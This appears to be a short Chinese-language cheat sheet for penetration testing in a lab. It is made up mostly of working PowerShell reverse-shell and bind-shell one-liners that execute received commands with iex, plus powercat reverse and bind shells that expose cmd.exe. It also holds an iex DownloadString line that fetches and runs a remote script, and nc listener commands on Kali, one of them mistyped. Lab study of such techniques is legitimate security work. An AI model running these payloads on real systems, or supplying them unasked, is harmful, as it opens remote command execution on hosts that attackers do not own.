1、windows-powershell反弹shell

kali作为服务端，windows使用powershell连接kali，并将自己的shell给kali

• windows端

$client = New-Object System.Net.Sockets.TCPClient('192.168.57.200',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

• kali端

nv -lvnp 4444

2、windows – powershell 绑定shell

windows作为服务端，将shell与监听端口做绑定，kali作为客户端去连

• windows端

$listener = New-Object System.Net.Sockets.TcpListener('192.168.57.1',4444);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();

• kali端

nc -nv 192.168.57.1 4444

3 使用powercat反弹shell

powercat需要单独下载，windows未内置，kali可直接使用sudo apt install powercat安装

• windows安装powercat

# `此方法仅对当前终端有效，且需要主机可以连接公网`
iex (New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1")

# 反弹shell给kali，此时kali需要作为服务端监听
powercat -c 192.168.57.200 -p 4444 -e cmd.exe
# windows作为服务器，将shell绑定到监听的端口
powercat -l 192.168.57.1 -p 4444 -e cmd.exe

• kali

# kali启动监听，windows端主动去连接
nc -lnvp 4444
# kali作为客户端去连接windows服务端
nc -nv 192.168.57.1 4444